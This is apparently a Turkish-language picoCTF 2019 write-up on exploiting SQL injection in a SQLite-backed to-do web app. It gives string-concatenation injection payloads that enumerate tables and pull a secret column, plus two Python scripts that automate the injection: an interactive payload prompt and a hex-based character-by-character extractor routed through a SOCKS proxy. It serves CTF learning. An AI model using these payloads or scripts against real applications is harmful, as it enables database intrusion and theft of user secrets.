SQL enjeksiyonu kontrolü için forma

'||(SQL)||'

Sunucu hatasını gördüğümde sql kod çalıştırılabileceğini görmüş  olduk. Bundan sonra sql kodları deneyerek sorudaki bahsedilen gizli şifreyi aramak gerekiyor. Bunun için toolda kullanılabilir.

'||(select tbl_name FROM sqlite_master WHERE type='table' limit 0,1 COLLATE NOCASE)||'

burada user tablosunun olduğunu gördük.

'||(select sql FROM sqlite_master WHERE type='table' limit 1,1 COLLATE NOCASE)||'

tablodaki alanların listesini aldık. secret alanı dikkatimizi çekti.

'||(select secret FROM user where secret like '%picoCTF%' limit 0,1 COLLATE NOCASE||'

veya

' || (SELECT group_concat(secret) FROM user) || '

user tablosundan bayrağı çekiyoruz.

Şimdi Bunlarla ilgili scriptler; Bu Scriptler düzenlenecek???????

script1.py:

import re
import html
import requests
from cmd import Cmd
from bs4 import BeautifulSoup

class Empire1(object):
  BASE_URL = "https://2019shell1.picoctf.com/problem/32160"
  
  def __init__(self):
    self.session = requests.Session() 
    
  def login(self, username, password):
    text = self.post(self.BASE_URL + "/login", {"username": username, "password": password})
    if "Invalid username or password" in text:
      raise Exception("Can't login")

  def post(self, uri, data):
    r = self.session.get(uri, headers = {"Referer": uri})
    csrf = self.get_csrf_token(r.text)
    d = {"csrf_token": csrf}
    d.update(data)
    r = self.session.post(uri, data = d, allow_redirects = True, headers = {"Referer": uri})
    if r.status_code != 200:
      raise Exception("Can't post to '{}'".format(uri))
    return r.text

  def add_item(self, item):
    text = self.post(self.BASE_URL + "/add_item", {"item": item})
    if "Item Added" not in text:
      raise Exception("Can't add item '{}'".format(item))

  def get_last_item(self):
    r = self.session.get(self.BASE_URL + "/list_items")
    parsed_html = BeautifulSoup(r.text, "lxml")
    return parsed_html.body.find_all('div', attrs={'class':'well well-sm'})[-1].findChildren("li" , recursive=False)[0].get_text().replace("Very Urgent: ", "")


  def get_csrf_token(self, html):
    token = re.search(r'<input id="csrf_token" name="csrf_token" type="hidden" value="([^"]+)">', html, re.MULTILINE)
    if token is None:
      raise Exception("Can't find CSRF token")
    return token.group(1)

class MyPrompt(Cmd):
  def __init__(self):
    Cmd.__init__(self)
    self.site = Empire1()
    self.site.login("user", "password")
    print "Logged in"

  def do_exit(self, inp):
    return True
 
  def do_send(self, param):
    q = "'||({})||'".format(param)
    self.site.add_item(q)
    print self.site.get_last_item()
 
MyPrompt().cmdloop()

script2.py:

#-*- encoding: utf-8 -*-

import string
import requests
import random
import re
import binascii
from html.parser import HTMLParser

letters = string.ascii_letters + string.digits


class Flask(object):
  def __init__(self):
    self.s = requests.Session()
    self.s.proxies = {
      "http": "socks5://127.0.0.1:1080",
      "https": "socks5://127.0.0.1:1080",
    }
    self.url = "https://2019shell1.picoctf.com/problem/32160"
    self.username = "".join([random.choice(letters) for i in range(0x10)])
    self.password = "".join([random.choice(letters) for i in range(0x10)])
    self.regster()
    self.login()

  def regster(self):
    path = "/register"
    r = self.s.post(self.url + path, data={
      'csrf_token': self.get_csrf_token(path),
      'username': self.username,
      'name': self.username,
      'password': self.password,
      'password2': self.password,
      'submit': 'Register',
    }, timeout=2)

  def login(self):
    path = '/login'
    r = self.s.post(self.url + path, data={
      'csrf_token': self.get_csrf_token(path),
      'username': self.username,
      'password': self.password,
      'submit': 'Sign In',
    }, timeout=2)

  def get_csrf_token(self, path):
    r = self.s.get(self.url + path, timeout=2)
    csrf_token = re.search('<input id="csrf_token" name="csrf_token" type="hidden" value="(.*?)">', r.text)
    if csrf_token:
      return csrf_token.group(1)

  def add_item(self, item):
    path = '/add_item'
    r = self.s.post(self.url + path, data={
      'csrf_token': self.get_csrf_token(path),
      'item': item,
      'submit': 'Create',
    }, timeout=2)
    if r.status_code == 500:
      return None
    else:
      rep = self.list_items()
      return rep[-1]

  def list_items(self):
    r = self.s.get(self.url + '/list_items', timeout=2)
    items = re.findall('<li>\\s*<strong>Very Urgent:</strong>\\s*(.*)\\s*</li>', r.text)
    items = list(map(lambda x: HTMLParser().unescape(x).strip(), items))
    return items


def brute_force(flask, payload):
  result = ""
  length = int(flask.add_item("'+length((%s))+'" % payload))
  payload = "'+hex(hex(substr((%s),{},4)))+'" % payload
  i = 1
  while i <= length:
    try:
      rep = flask.add_item(payload.format(i))
      #print(i, rep)
    except:
      rep = False

    if rep:
      result += binascii.unhexlify(binascii.unhexlify(rep).decode('utf-8')).decode('utf-8')
      print(result)
      i += 4
  print("Result:", result)


def main():
  f = Flask()
  brute_force(f, "SELECT name FROM sqlite_master WHERE type='table'")
  brute_force(f, "SELECT sql FROM sqlite_master WHERE type='table'")
  brute_force(f, "SELECT admin FROM user WHERE username='%s'" % f.username)
  brute_force(f, "SELECT secret FROM user WHERE username='%s'" % f.username)
  while True:
    payload = input("Payload: ")
    try:
      rep = f.add_item(payload)
    except:
      rep = False
    print("Respone:", rep, end="\n\n")


if __name__ == '__main__':
  main()

 

kodları güzel yazmışlar ama bir kaç eksik var vakit bulunca inceleyecem. ikiside aynı işi yapıyor.